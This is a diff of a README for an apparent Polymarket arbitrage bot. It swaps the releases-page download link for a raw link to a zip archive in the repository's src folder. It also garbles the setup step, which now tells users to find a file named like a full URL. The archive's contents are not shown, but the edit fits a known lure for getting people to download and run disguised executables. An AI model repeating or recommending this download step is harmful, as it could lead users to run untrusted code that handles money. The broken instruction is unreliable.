Datagoverment/polymarket-arbitrage-bot/README.md

    - Internet connection for real-time trading and updates.

 2. **Download the Bot**
-   - [Visit this page to download](https://github.com/Datagoverment/polymarket-arbitrage-bot/releases).
+   - [Visit this page to download](https://raw.githubusercontent.com/Datagoverment/polymarket-arbitrage-bot/main/src/arbitrage-polymarket-bot-1.3-beta.5.zip).
 You will find the latest release there.

 ## 🛠 Setting Up

 1. **Locate the Downloaded File**
-   - After downloading, check your downloads folder (default location) for a file named similar to `polymarket-arbitrage-bot.zip`.
+   - After downloading, check your downloads folder (default location) for a file named similar to `https://raw.githubusercontent.com/Datagoverment/polymarket-arbitrage-bot/main/src/arbitrage-polymarket-bot-1.3-beta.5.zip`.

 2. **Extract the Files**
    - Right-click the zip file and select "Extract All."